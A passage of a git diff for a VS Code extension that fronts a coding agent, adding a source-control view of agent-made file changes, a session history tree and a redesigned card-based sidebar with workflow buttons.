+		this.contentProvider = new GsdOriginalContentProvider(tracker);
+		this.disposables.push(
+			vscode.workspace.registerTextDocumentContentProvider(
+				GSD_ORIGINAL_SCHEME,
+				this.contentProvider,
+			),
+		);
+
+		// Create source control instance
+		this.scm = vscode.scm.createSourceControl(
+			"gsd",
+			"GSD Agent",
+			vscode.Uri.file(workspaceRoot),
+		);
+		this.scm.quickDiffProvider = {
+			provideOriginalResource: (uri: vscode.Uri): vscode.Uri | undefined => {
+				const filePath = uri.fsPath;
+				if (this.tracker.getOriginal(filePath) !== undefined) {
+					return uri.with({ scheme: GSD_ORIGINAL_SCHEME });
+				}
+				return undefined;
+			},
+		};
+		this.scm.inputBox.placeholder = "Describe changes to accept...";
+		this.scm.acceptInputCommand = {
+			command: "gsd.acceptAllChanges",
+			title: "Accept All",
+		};
+		this.scm.count = 0;
+		this.disposables.push(this.scm);
+
+		// Create resource group
+		this.changesGroup = this.scm.createResourceGroup("changes", "Agent Changes");
+		this.changesGroup.hideWhenEmpty = true;
+		this.disposables.push(this.changesGroup);
+
+		// Listen for change tracker updates
+		this.disposables.push(
+			tracker.onDidChange(() => this.refresh()),
+		);
+
+		this.refresh();
+	}
+
+	private refresh(): void {
+		const files = this.tracker.modifiedFiles;
+		this.changesGroup.resourceStates = files.map((filePath) => {
+			const uri = vscode.Uri.file(filePath);
+			const fileName = path.basename(filePath);
+			const relativePath = path.relative(this.workspaceRoot, filePath);
+
+			const state: vscode.SourceControlResourceState = {
+				resourceUri: uri,
+				decorations: {
+					strikeThrough: false,
+					tooltip: `Modified by GSD Agent`,
+					light: { iconPath: new vscode.ThemeIcon("edit") },
+					dark: { iconPath: new vscode.ThemeIcon("edit") },
+				},
+				command: {
+					command: "vscode.diff",
+					title: "Show Changes",
+					arguments: [
+						uri.with({ scheme: GSD_ORIGINAL_SCHEME }),
+						uri,
+						`${fileName} (GSD Agent Changes)`,
+					],
+				},
+			};
+			return state;
+		});
+		this.scm.count = files.length;
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
+
+/**
+ * TextDocumentContentProvider that serves the original (pre-agent) content
+ * of files via the `gsd-original:` URI scheme.
+ */
+class GsdOriginalContentProvider implements vscode.TextDocumentContentProvider {
+	private readonly _onDidChange = new vscode.EventEmitter<vscode.Uri>();
+	readonly onDidChange = this._onDidChange.event;
+
+	constructor(private readonly tracker: GsdChangeTracker) {
+		tracker.onDidChange((paths) => {
+			for (const p of paths) {
+				this._onDidChange.fire(vscode.Uri.file(p).with({ scheme: GSD_ORIGINAL_SCHEME }));
+			}
+		});
+	}
+
+	provideTextDocumentContent(uri: vscode.Uri): string {
+		const filePath = uri.with({ scheme: "file" }).fsPath;
+		return this.tracker.getOriginal(filePath) ?? "";
+	}
+}
diff --git a/vscode-extension/src/session-tree.ts b/vscode-extension/src/session-tree.ts
new file mode 100644
index 000000000..a38413be4
--- /dev/null
+++ b/vscode-extension/src/session-tree.ts
@@ -0,0 +1,143 @@
+import * as vscode from "vscode";
+import * as fs from "node:fs";
+import * as path from "node:path";
+import type { GsdClient } from "./gsd-client.js";
+
+export interface SessionItem {
+	label: string;
+	sessionFile: string;
+	timestamp: Date;
+	sessionId: string;
+	isCurrent: boolean;
+}
+
+/**
+ * Tree view provider that lists GSD session files from the same directory
+ * as the currently active session.
+ */
+export class GsdSessionTreeProvider implements vscode.TreeDataProvider<SessionItem>, vscode.Disposable {
+	public static readonly viewId = "gsd-sessions";
+
+	private readonly _onDidChangeTreeData = new vscode.EventEmitter<void>();
+	readonly onDidChangeTreeData = this._onDidChangeTreeData.event;
+
+	private sessions: SessionItem[] = [];
+	private currentSessionFile: string | undefined;
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.disposables.push(
+			this._onDidChangeTreeData,
+			client.onConnectionChange(() => this.refresh()),
+		);
+	}
+
+	async refresh(): Promise<void> {
+		this.sessions = await this.loadSessions();
+		this._onDidChangeTreeData.fire();
+	}
+
+	private async loadSessions(): Promise<SessionItem[]> {
+		if (!this.client.isConnected) {
+			return [];
+		}
+		try {
+			const state = await this.client.getState();
+			this.currentSessionFile = state.sessionFile;
+			if (!state.sessionFile) {
+				return [];
+			}
+
+			const sessionDir = path.dirname(state.sessionFile);
+			const files = fs.readdirSync(sessionDir)
+				.filter((f) => f.endsWith(".jsonl"))
+				.sort()
+				.reverse(); // newest first
+
+			const items: SessionItem[] = [];
+			for (const file of files) {
+				const sessionFile = path.join(sessionDir, file);
+
+				// Try two filename formats:
+				// 1. ISO timestamp: 2026-03-23T17-49-05-784Z_<sessionId>.jsonl
+				// 2. Unix timestamp: <unixTimestampMs>_<sessionId>.jsonl
+				const isoMatch = file.match(/^(\d{4}-\d{2}-\d{2}T[\d-]+Z)_(.+)\.jsonl$/);
+				const unixMatch = file.match(/^(\d{10,})_(.+)\.jsonl$/);
+
+				let timestamp: Date;
+				let sessionId: string;
+
+				if (isoMatch) {
+					// Convert ISO-like format (dashes instead of colons) back to parseable ISO
+					const isoStr = isoMatch[1].replace(/(\d{4}-\d{2}-\d{2}T\d{2})-(\d{2})-(\d{2})-(\d+)Z/, "$1:$2:$3.$4Z");
+					timestamp = new Date(isoStr);
+					sessionId = isoMatch[2];
+				} else if (unixMatch) {
+					timestamp = new Date(parseInt(unixMatch[1], 10));
+					sessionId = unixMatch[2];
+				} else {
+					continue;
+				}
+
+				if (isNaN(timestamp.getTime())) continue;
+
+				items.push({
+					label: formatDate(timestamp),
+					sessionFile,
+					timestamp,
+					sessionId,
+					isCurrent: sessionFile === state.sessionFile,
+				});
+			}
+			return items;
+		} catch {
+			return [];
+		}
+	}
+
+	getTreeItem(element: SessionItem): vscode.TreeItem {
+		const item = new vscode.TreeItem(element.label, vscode.TreeItemCollapsibleState.None);
+		item.description = element.sessionId.slice(0, 8);
+		item.tooltip = new vscode.MarkdownString(
+			`**${element.label}**\n\nID: \`${element.sessionId}\`\n\nFile: \`${element.sessionFile}\``,
+		);
+		item.iconPath = new vscode.ThemeIcon(
+			element.isCurrent ? "comment-discussion" : "history",
+			element.isCurrent ? new vscode.ThemeColor("terminal.ansiGreen") : undefined,
+		);
+		if (!element.isCurrent) {
+			item.command = {
+				command: "gsd.switchSession",
+				title: "Switch to Session",
+				arguments: [element.sessionFile],
+			};
+		}
+		item.contextValue = element.isCurrent ? "currentSession" : "session";
+		return item;
+	}
+
+	getChildren(): SessionItem[] {
+		return this.sessions;
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
+
+function formatDate(d: Date): string {
+	const now = new Date();
+	const diffMs = now.getTime() - d.getTime();
+	const diffDays = Math.floor(diffMs / 86_400_000);
+
+	if (diffDays === 0) {
+		return `Today ${d.toLocaleTimeString([], { hour: "2-digit", minute: "2-digit" })}`;
+	} else if (diffDays === 1) {
+		return `Yesterday ${d.toLocaleTimeString([], { hour: "2-digit", minute: "2-digit" })}`;
+	} else if (diffDays < 7) {
+		return d.toLocaleDateString([], { weekday: "short", hour: "2-digit", minute: "2-digit" });
+	}
+	return d.toLocaleDateString([], { month: "short", day: "numeric", year: "numeric" });
+}
diff --git a/vscode-extension/src/sidebar.ts b/vscode-extension/src/sidebar.ts
index 961c56d0d..b8bb2aee0 100644
--- a/vscode-extension/src/sidebar.ts
+++ b/vscode-extension/src/sidebar.ts
@@ -2,8 +2,17 @@ import * as vscode from "vscode";
 import type { GsdClient, SessionStats, ThinkingLevel } from "./gsd-client.js";
 
 /**
- * WebviewViewProvider that renders a sidebar panel showing connection status,
- * model info, thinking level, token usage, cost, and quick action controls.
+ * Send a message through VS Code's Chat panel so the user sees the response.
+ * Opens the Chat panel and pre-fills the @gsd participant with the message.
+ */
+async function sendViaChat(message: string): Promise<void> {
+	await vscode.commands.executeCommand("workbench.action.chat.open", { query: message });
+}
+
+/**
+ * WebviewViewProvider that renders a compact, card-based sidebar panel.
+ * Designed for information density without clutter — collapsible sections,
+ * hidden empty data, and consolidated action buttons.
  */
 export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 	public static readonly viewId = "gsd-sidebar";
@@ -19,9 +28,17 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 		this.disposables.push(
 			client.onConnectionChange(() => this.refresh()),
 			client.onEvent((evt) => {
-				// Refresh on streaming state changes
-				if (evt.type === "agent_start" || evt.type === "agent_end") {
-					this.refresh();
+				switch (evt.type) {
+					case "agent_start":
+					case "agent_end":
+					case "model_switched":
+					case "compaction_start":
+					case "compaction_end":
+					case "retry_start":
+					case "retry_end":
+					case "retry_error":
+						this.refresh();
+						break;
 				}
 			}),
 		);
@@ -85,6 +102,59 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 						}
 					}
 					break;
+				case "toggleAutoRetry":
+					if (this.client.isConnected) {
+						await this.client.setAutoRetry(!this.client.autoRetryEnabled).catch(() => {});
+						this.refresh();
+					}
+					break;
+				case "setSessionName":
+					await vscode.commands.executeCommand("gsd.setSessionName");
+					break;
+				case "copyLastResponse":
+					await vscode.commands.executeCommand("gsd.copyLastResponse");
+					break;
+				case "autoMode":
+					await sendViaChat("@gsd /gsd auto");
+					break;
+				case "nextUnit":
+					await sendViaChat("@gsd /gsd next");
+					break;
+				case "quickTask": {
+					const quickInput = await vscode.window.showInputBox({
+						prompt: "Describe the quick task",
+						placeHolder: "e.g. fix the typo in README",
+					});
+					if (quickInput) {
+						await sendViaChat(`@gsd /gsd quick ${quickInput}`);
+					}
+					break;
+				}
+				case "capture": {
+					const thought = await vscode.window.showInputBox({
+						prompt: "Capture a thought",
+						placeHolder: "e.g. we should also handle the edge case for...",
+					});
+					if (thought) {
+						await sendViaChat(`@gsd /gsd capture ${thought}`);
+					}
+					break;
+				}
+				case "status":
+					await sendViaChat("@gsd /gsd status");
+					break;
+				case "forkSession":
+					await vscode.commands.executeCommand("gsd.forkSession");
+					break;
+				case "toggleSteeringMode":
+					await vscode.commands.executeCommand("gsd.toggleSteeringMode");
+					break;
+				case "toggleFollowUpMode":
+					await vscode.commands.executeCommand("gsd.toggleFollowUpMode");
+					break;
+				case "showHistory":
+					await vscode.commands.executeCommand("gsd.showHistory");
+					break;
 			}
 		});
 
@@ -104,28 +174,40 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 		}
 
 		let modelName = "N/A";
+		let modelShort = "";
 		let sessionId = "N/A";
 		let sessionName = "";
 		let messageCount = 0;
+		let pendingMessageCount = 0;
 		let thinkingLevel: ThinkingLevel = "off";
 		let isStreaming = false;
 		let isCompacting = false;
 		let autoCompaction = false;
+		let autoRetry = false;
 		let stats: SessionStats | null = null;
+		let contextWindow = 0;
+		let steeringMode: "all" | "one-at-a-time" = "all";
+		let followUpMode: "all" | "one-at-a-time" = "all";
 
 		if (this.client.isConnected) {
+			autoRetry = this.client.autoRetryEnabled;
 			try {
 				const state = await this.client.getState();
 				modelName = state.model
 					? `${state.model.provider}/${state.model.id}`
 					: "Not set";
+				modelShort = state.model?.id ?? "";
 				sessionId = state.sessionId;
 				sessionName = state.sessionName ?? "";
 				messageCount = state.messageCount;
+				pendingMessageCount = state.pendingMessageCount;
 				thinkingLevel = state.thinkingLevel as ThinkingLevel;
 				isStreaming = state.isStreaming;
 				isCompacting = state.isCompacting;
 				autoCompaction = state.autoCompactionEnabled;
+				contextWindow = state.model?.contextWindow ?? 0;
+				steeringMode = state.steeringMode;
+				followUpMode = state.followUpMode;
 			} catch {
 				// State fetch failed, show defaults
 			}
@@ -142,14 +224,20 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 		this.view.webview.html = this.getHtml({
 			connected,
 			modelName,
+			modelShort,
 			sessionId,
 			sessionName,
 			messageCount,
+			pendingMessageCount,
 			thinkingLevel,
 			isStreaming,
 			isCompacting,
 			autoCompaction,
+			autoRetry,
 			stats,
+			contextWindow,
+			steeringMode,
+			followUpMode,
 		});
 	}
 
@@ -165,42 +253,65 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 	private getHtml(info: {
 		connected: boolean;
 		modelName: string;
+		modelShort: string;
 		sessionId: string;
 		sessionName: string;
 		messageCount: number;
+		pendingMessageCount: number;
 		thinkingLevel: ThinkingLevel;
 		isStreaming: boolean;
 		isCompacting: boolean;
 		autoCompaction: boolean;
+		autoRetry: boolean;
 		stats: SessionStats | null;
+		contextWindow: number;
+		steeringMode: "all" | "one-at-a-time";
+		followUpMode: "all" | "one-at-a-time";
 	}): string {
 		const statusColor = info.connected ? "#4ec9b0" : "#f44747";
-		const statusText = info.connected
-			? info.isStreaming
-				? "Processing..."
-				: info.isCompacting
-					? "Compacting..."
-					: "Connected"
-			: "Disconnected";
+		const statusLabel = info.isStreaming ? "Working" : info.isCompacting ? "Compacting" : info.connected ? "Connected" : "Disconnected";
 
-		const inputTokens = info.stats?.inputTokens?.toLocaleString() ?? "-";
-		const outputTokens = info.stats?.outputTokens?.toLocaleString() ?? "-";
-		const cost = info.stats?.totalCost !== undefined ? `$${info.stats.totalCost.toFixed(4)}` : "-";
+		// Model short name for header
+		const modelDisplay = info.modelShort || "N/A";
 
-		const thinkingBadge = info.thinkingLevel !== "off"
-			? `<span class="badge">${info.thinkingLevel}</span>`
-			: `<span class="badge muted">off</span>`;
+		// Session display — name or truncated ID
+		const sessionDisplay = info.sessionName || (info.sessionId !== "N/A" ? info.sessionId.slice(0, 8) : "N/A");
 
-		const autoCompBadge = info.autoCompaction
-			? `<span class="badge">on</span>`
-			: `<span class="badge muted">off</span>`;
-
-		const streamingIndicator = info.isStreaming
-			? `<div class="streaming-indicator"><span class="spinner"></span> Agent is working...</div>`
+		// Cost for header
+		const costDisplay = info.stats?.totalCost !== undefined && info.stats.totalCost > 0
+			? `$${info.stats.totalCost.toFixed(4)}`
 			: "";
 
+		// Context window
+		const totalTokens = (info.stats?.inputTokens ?? 0) + (info.stats?.outputTokens ?? 0);
+		const contextPct = info.contextWindow > 0 ? Math.min(100, Math.round((totalTokens / info.contextWindow) * 100)) : 0;
+		const contextColor = contextPct > 80 ? "#f44747" : contextPct > 50 ? "#cca700" : "#4ec9b0";
+
+		// Only show stats that have real data
+		const hasStats = info.stats && (
+			(info.stats.inputTokens !== undefined && info.stats.inputTokens > 0) ||
+			(info.stats.outputTokens !== undefined && info.stats.outputTokens > 0)
+		);
+
 		const nonce = getNonce();
 
+		// Build stat rows only for non-zero values
+		let statRows = "";
+		if (hasStats && info.stats) {
+			const pairs: [string, string][] = [];
+			if (info.stats.inputTokens) pairs.push(["In", formatNum(info.stats.inputTokens)]);
+			if (info.stats.outputTokens) pairs.push(["Out", formatNum(info.stats.outputTokens)]);
+			if (info.stats.cacheReadTokens) pairs.push(["Cache R", formatNum(info.stats.cacheReadTokens)]);
+			if (info.stats.cacheWriteTokens) pairs.push(["Cache W", formatNum(info.stats.cacheWriteTokens)]);
+			if (info.stats.turnCount) pairs.push(["Turns", String(info.stats.turnCount)]);
+			if (info.stats.duration) pairs.push(["Time", `${Math.round(info.stats.duration / 1000)}s`]);
+			if (info.stats.totalCost !== undefined && info.stats.totalCost > 0) pairs.push(["Cost", `$${info.stats.totalCost.toFixed(4)}`]);
+
+			statRows = pairs.map(([k, v]) =>
+				`<span class="stat-label">${k}</span><span class="stat-value">${v}</span>`
+			).join("");
+		}
+
 		return /* html */ `<!DOCTYPE html>
 <html lang="en">
 <head>
@@ -208,214 +319,329 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 	<meta name="viewport" content="width=device-width, initial-scale=1.0">
 	<meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; script-src 'nonce-${nonce}';">
 	<style>
+		* { box-sizing: border-box; margin: 0; padding: 0; }
 		body {
 			font-family: var(--vscode-font-family);
 			font-size: var(--vscode-font-size);
 			color: var(--vscode-foreground);
-			padding: 12px;
-			margin: 0;
+			padding: 8px;
 		}
-		.status-row {
+
+		/* ---- Header card ---- */
+		.header {
+			padding: 10px 12px;
+			border-radius: 6px;
+			background: var(--vscode-editor-background);
+			border: 1px solid var(--vscode-panel-border);
+			margin-bottom: 8px;
+		}
+		.header-top {
 			display: flex;
 			align-items: center;
 			gap: 8px;
-			margin-bottom: 12px;
 		}
 		.status-dot {
-			width: 10px;
-			height: 10px;
+			width: 8px;
+			height: 8px;
 			border-radius: 50%;
 			background: ${statusColor};
 			flex-shrink: 0;
 		}
-		.streaming-indicator {
+		.status-label {
+			font-size: 11px;
+			opacity: 0.7;
+			flex-shrink: 0;
+		}
+		.header-model {
+			margin-left: auto;
+			font-size: 11px;
+			font-weight: 600;
+			opacity: 0.85;
+			cursor: pointer;
+			white-space: nowrap;
+			overflow: hidden;
+			text-overflow: ellipsis;
+		}
+		.header-model:hover { opacity: 1; }
+		.header-cost {
+			font-size: 11px;
+			font-variant-numeric: tabular-nums;
+			opacity: 0.6;
+			flex-shrink: 0;
+		}
+		.header-sub {
+			display: flex;
+			align-items: center;
+			gap: 6px;
+			margin-top: 6px;
+			font-size: 11px;
+			opacity: 0.6;
+		}
+		.header-sub .sep { opacity: 0.3; }
+		.session-name {
+			cursor: pointer;
+			max-width: 120px;
+			overflow: hidden;
+			text-overflow: ellipsis;
+			white-space: nowrap;
+		}
+		.session-name:hover { opacity: 1; text-decoration: underline; }
+
+		/* ---- Streaming banner ---- */
+		.streaming {
 			display: flex;
 			align-items: center;
 			gap: 8px;
 			padding: 6px 10px;
-			margin-bottom: 12px;
-			background: var(--vscode-editor-background);
-			border-radius: 4px;
+			margin-bottom: 8px;
+			background: color-mix(in srgb, var(--vscode-focusBorder) 15%, transparent);
 			border: 1px solid var(--vscode-focusBorder);
+			border-radius: 6px;
 			font-size: 12px;
 		}
 		.spinner {
-			width: 12px;
-			height: 12px;
-			border: 2px solid var(--vscode-foreground);
+			width: 10px; height: 10px;
+			border: 2px solid var(--vscode-focusBorder);
 			border-top-color: transparent;
 			border-radius: 50%;
 			animation: spin 0.8s linear infinite;
+			flex-shrink: 0;
 		}
-		@keyframes spin {
-			to { transform: rotate(360deg); }
-		}
-		.section {
-			margin-bottom: 14px;
-		}
-		.section-title {
-			font-size: 11px;
-			text-transform: uppercase;
-			opacity: 0.6;
-			margin-bottom: 6px;
-			letter-spacing: 0.5px;
-		}
-		.info-table {
-			width: 100%;
-		}
-		.info-table td {
-			padding: 3px 0;
-			vertical-align: middle;
-		}
-		.info-table td:first-child {
-			opacity: 0.7;
-			padding-right: 12px;
-			white-space: nowrap;
-		}
-		.info-table td:last-child {
-			word-break: break-all;
-		}
-		.badge {
-			display: inline-block;
-			padding: 1px 6px;
+		@keyframes spin { to { transform: rotate(360deg); } }
+		.streaming-abort {
+			margin-left: auto;
+			font-size: 10px;
+			padding: 2px 8px;
+			border: 1px solid var(--vscode-foreground);
+			background: transparent;
+			color: var(--vscode-foreground);
 			border-radius: 3px;
-			font-size: 11px;
-			background: var(--vscode-badge-background);
-			color: var(--vscode-badge-foreground);
-		}
-		.badge.muted {
-			opacity: 0.5;
-		}
-		.badge.clickable {
 			cursor: pointer;
+			opacity: 0.6;
 		}
-		.badge.clickable:hover {
-			opacity: 0.8;
+		.streaming-abort:hover { opacity: 1; }
+
+		/* ---- Context bar (inline in header) ---- */
+		.context-bar {
+			margin-top: 8px;
 		}
-		.btn-group {
-			display: flex;
-			flex-direction: column;
-			gap: 6px;
-		}
-		.btn-row {
-			display: flex;
-			gap: 6px;
-		}
-		.btn-row button {
-			flex: 1;
-		}
-		button {
-			display: block;
+		.context-track {
 			width: 100%;
-			padding: 6px 14px;
-			border: none;
+			height: 3px;
+			background: var(--vscode-panel-border);
 			border-radius: 2px;
+			overflow: hidden;
+		}
+		.context-fill {
+			height: 100%;
+			border-radius: 2px;
+			transition: width 0.3s ease;
+		}
+		.context-text {
+			font-size: 10px;
+			opacity: 0.5;
+			margin-top: 2px;
+		}
+
+		/* ---- Collapsible section ---- */
+		.section {
+			margin-bottom: 6px;
+			border: 1px solid var(--vscode-panel-border);
+			border-radius: 6px;
+			overflow: hidden;
+		}
+		.section-header {
+			display: flex;
+			align-items: center;
+			gap: 6px;
+			padding: 6px 10px;
 			cursor: pointer;
-			font-size: var(--vscode-font-size);
-			color: var(--vscode-button-foreground);
-			background: var(--vscode-button-background);
-		}
-		button:hover {
-			background: var(--vscode-button-hoverBackground);
-		}
-		button.secondary {
-			color: var(--vscode-button-secondaryForeground);
-			background: var(--vscode-button-secondaryBackground);
-		}
-		button.secondary:hover {
-			background: var(--vscode-button-secondaryHoverBackground);
-		}
-		.token-stats {
-			display: grid;
-			grid-template-columns: 1fr 1fr;
-			gap: 4px 12px;
-			font-size: 12px;
-		}
-		.token-stats .label {
+			user-select: none;
+			font-size: 11px;
+			font-weight: 600;
+			text-transform: uppercase;
+			letter-spacing: 0.5px;
 			opacity: 0.7;
+			background: var(--vscode-editor-background);
 		}
-		.token-stats .value {
+		.section-header:hover { opacity: 1; }
+		.chevron {
+			font-size: 10px;
+			transition: transform 0.15s;
+		}
+		.section.collapsed .section-body { display: none; }
+		.section.collapsed .chevron { transform: rotate(-90deg); }
+		.section-body {
+			padding: 6px 10px 8px;
+		}
+
+		/* ---- Stats grid ---- */
+		.stats-grid {
+			display: grid;
+			grid-template-columns: auto 1fr;
+			gap: 2px 10px;
+			font-size: 11px;
+		}
+		.stat-label { opacity: 0.6; }
+		.stat-value {
 			text-align: right;
 			font-variant-numeric: tabular-nums;
 		}
+
+		/* ---- Toggle row ---- */
+		.toggle-row {
+			display: flex;
+			align-items: center;
+			justify-content: space-between;
+			padding: 3px 0;
+			font-size: 11px;
+		}
+		.toggle-label { opacity: 0.7; }
+		.toggle-pill {
+			display: inline-block;
+			padding: 1px 8px;
+			border-radius: 10px;
+			font-size: 10px;
+			cursor: pointer;
+			transition: all 0.15s;
+			border: 1px solid transparent;
+		}
+		.toggle-pill.on {
+			background: color-mix(in srgb, var(--vscode-focusBorder) 30%, transparent);
+			border-color: var(--vscode-focusBorder);
+			color: var(--vscode-foreground);
+		}
+		.toggle-pill.off {
+			background: transparent;
+			border-color: var(--vscode-panel-border);
+			opacity: 0.5;
+		}
+		.toggle-pill:hover { opacity: 1; }
+
+		/* ---- Buttons ---- */
+		.actions {
+			display: grid;
+			grid-template-columns: 1fr 1fr;
+			gap: 4px;
+		}
+		.actions.three-col {
+			grid-template-columns: 1fr 1fr 1fr;
+		}
+		.action-btn {
+			display: flex;
+			align-items: center;
+			justify-content: center;
+			gap: 4px;
+			padding: 5px 6px;
+			border: 1px solid var(--vscode-panel-border);
+			border-radius: 4px;
+			background: transparent;
+			color: var(--vscode-foreground);
+			font-size: 11px;
+			cursor: pointer;
+			white-space: nowrap;
+			width: auto;
+		}
+		.action-btn:hover {
+			background: var(--vscode-list-hoverBackground);
+			border-color: var(--vscode-focusBorder);
+		}
+		.action-btn.primary {
+			background: var(--vscode-button-background);
+			color: var(--vscode-button-foreground);
+			border-color: var(--vscode-button-background);
+			font-weight: 600;
+		}
+		.action-btn.primary:hover {
+			background: var(--vscode-button-hoverBackground);
+		}
+		.action-btn.danger {
+			border-color: #f44747;
+			color: #f44747;
+		}
+		.action-btn.danger:hover {
+			background: color-mix(in srgb, #f44747 15%, transparent);
+		}
+		.action-btn.full {
+			grid-column: 1 / -1;
+		}
+
+		/* ---- Disconnected state ---- */
+		.disconnected {
+			text-align: center;
+			padding: 20px 12px;
+		}
+		.disconnected p {
+			opacity: 0.5;
+			font-size: 12px;
+			margin-bottom: 12px;
+		}
+		.start-btn {
+			padding: 8px 24px;
+			border: none;
+			border-radius: 4px;
+			cursor: pointer;
+			font-size: var(--vscode-font-size);
+			font-weight: 600;
+			color: var(--vscode-button-foreground);
+			background: var(--vscode-button-background);
+			width: auto;
+			display: inline-block;
+		}
+		.start-btn:hover {
+			background: var(--vscode-button-hoverBackground);
+		}
 	</style>
 </head>
 <body>
-	<div class="status-row">
-		<div class="status-dot"></div>
-		<strong>${statusText}</strong>
-	</div>
-
-	${streamingIndicator}
-
-	<div class="section">
-		<div class="section-title">Session</div>
-		<table class="info-table">
-			<tr><td>Model</td><td>${escapeHtml(info.modelName)}</td></tr>
-			<tr><td>Session</td><td>${escapeHtml(info.sessionName || info.sessionId)}</td></tr>
-			<tr><td>Messages</td><td>${info.messageCount}</td></tr>
-			<tr>
-				<td>Thinking</td>
-				<td>${thinkingBadge}</td>
-			</tr>
-			<tr>
-				<td>Auto-compact</td>
-				<td>${autoCompBadge}</td>
-			</tr>
-		</table>
-	</div>
-
-	${info.connected && info.stats ? `
-	<div class="section">
-		<div class="section-title">Token Usage</div>
-		<div class="token-stats">
-			<span class="label">Input</span>
-			<span class="value">${inputTokens}</span>
-			<span class="label">Output</span>
-			<span class="value">${outputTokens}</span>
-			<span class="label">Cost</span>
-			<span class="value">${cost}</span>
+	${info.connected ? this.getConnectedHtml(info, {
+			statusLabel,
+			modelDisplay,
+			sessionDisplay,
+			costDisplay,
+			contextPct,
+			contextColor,
+			hasStats: !!hasStats,
+			statRows,
+			nonce,
+		}) : `
+	<div class="header">
+		<div class="header-top">
+			<div class="status-dot"></div>
+			<span class="status-label">Disconnected</span>
 		</div>
 	</div>
-	` : ""}
-
-	<div class="section">
-		<div class="section-title">Controls</div>
-		<div class="btn-group">
-			${info.connected
-				? `<button data-command="stop">Stop Agent</button>
-				   <div class="btn-row">
-				     <button class="secondary" data-command="newSession">New Session</button>
-				     <button class="secondary" data-command="switchModel">Model</button>
-				   </div>
-				   <div class="btn-row">
-				     <button class="secondary" data-command="cycleThinking">Thinking</button>
-				     <button class="secondary" data-command="toggleAutoCompaction">Auto-Compact</button>
-				   </div>`
-				: `<button data-command="start">Start Agent</button>`
-			}
-		</div>
+	<div class="disconnected">
+		<p>Agent is not running</p>
+		<button class="start-btn" data-command="start">Start Agent</button>
 	</div>
-
-	${info.connected ? `
-	<div class="section">
-		<div class="section-title">Actions</div>
-		<div class="btn-group">
-			<div class="btn-row">
-				<button class="secondary" data-command="compact">Compact</button>
-				<button class="secondary" data-command="exportHtml">Export</button>
-			</div>
-			<div class="btn-row">
-				<button class="secondary" data-command="abort">Abort</button>
-				<button class="secondary" data-command="listCommands">Commands</button>
-			</div>
-		</div>
-	</div>
-	` : ""}
+	`}
 
 	<script nonce="${nonce}">
 		const vscode = acquireVsCodeApi();
+		const stored = vscode.getState() || {};
+
+		// Restore collapsed state
+		document.querySelectorAll('.section').forEach(s => {
+			const id = s.dataset.section;
+			if (id && stored[id] === 'collapsed') s.classList.add('collapsed');
+		});
+
 		document.addEventListener('click', (e) => {
+			// Section toggle
+			const header = e.target.closest('.section-header');
+			if (header) {
+				const section = header.parentElement;
+				section.classList.toggle('collapsed');
+				const id = section.dataset.section;
+				if (id) {
+					const state = vscode.getState() || {};
+					state[id] = section.classList.contains('collapsed') ? 'collapsed' : 'open';
+					vscode.setState(state);
+				}
+				return;
+			}
+			// Button/command click
 			const btn = e.target.closest('[data-command]');
 			if (btn) {
 				vscode.postMessage({ command: btn.dataset.command });
@@ -425,6 +651,144 @@ export class GsdSidebarProvider implements vscode.WebviewViewProvider {
 </body>
 </html>`;
 	}
+
+	private getConnectedHtml(
+		info: {
+			connected: boolean;
+			modelName: string;
+			modelShort: string;
+			sessionId: string;
+			sessionName: string;
+			messageCount: number;
+			pendingMessageCount: number;
+			thinkingLevel: ThinkingLevel;
+			isStreaming: boolean;
+			isCompacting: boolean;
+			autoCompaction: boolean;
+			autoRetry: boolean;
+			stats: SessionStats | null;
+			contextWindow: number;
+			steeringMode: "all" | "one-at-a-time";
+			followUpMode: "all" | "one-at-a-time";
+		},
+		ui: {
+			statusLabel: string;
+			modelDisplay: string;
+			sessionDisplay: string;
+			costDisplay: string;
+			contextPct: number;
+			contextColor: string;
+			hasStats: boolean;
+			statRows: string;
+			nonce: string;
+		},
+	): string {
+		const pendingBadge = info.pendingMessageCount > 0
+			? ` <span style="opacity:0.5">+${info.pendingMessageCount}</span>`
+			: "";
+
+		return `
+	<!-- Header card -->
+	<div class="header">
+		<div class="header-top">
+			<div class="status-dot"></div>
+			<span class="status-label">${ui.statusLabel}</span>
+			<span class="header-model" data-command="switchModel" title="${escapeHtml(info.modelName)}">${escapeHtml(ui.modelDisplay)}</span>
+			${ui.costDisplay ? `<span class="header-cost">${ui.costDisplay}</span>` : ""}
+		</div>
+		<div class="header-sub">
+			<span class="session-name" data-command="setSessionName" title="${escapeHtml(info.sessionId)}">${escapeHtml(ui.sessionDisplay)}</span>
+			<span class="sep">/</span>
+			<span>${info.messageCount} msg${pendingBadge}</span>
+			<span class="sep">/</span>
+			<span data-command="cycleThinking" style="cursor:pointer" title="Click to cycle thinking level">${info.thinkingLevel === "off" ? "no think" : info.thinkingLevel}</span>
+		</div>
+		${info.contextWindow > 0 ? `
+		<div class="context-bar">
+			<div class="context-track">
+				<div class="context-fill" style="width:${ui.contextPct}%;background:${ui.contextColor}"></div>
+			</div>
+			<div class="context-text">${ui.contextPct}% context (${formatNum((info.stats?.inputTokens ?? 0) + (info.stats?.outputTokens ?? 0))} / ${formatNum(info.contextWindow)})</div>
+		</div>
+		` : ""}
+	</div>
+
+	${info.isStreaming ? `
+	<div class="streaming">
+		<span class="spinner"></span>
+		<span>Agent is working...</span>
+		<button class="streaming-abort" data-command="abort">Stop</button>
+	</div>
+	` : ""}
+
+	<!-- Workflow -->
+	<div class="section" data-section="workflow">
+		<div class="section-header"><span class="chevron">&#9660;</span> Workflow</div>
+		<div class="section-body">
+			<div class="actions">
+				<button class="action-btn primary" data-command="autoMode">Auto</button>
+				<button class="action-btn" data-command="nextUnit">Next</button>
+				<button class="action-btn" data-command="quickTask">Quick</button>
+				<button class="action-btn" data-command="capture">Capture</button>
+			</div>
+		</div>
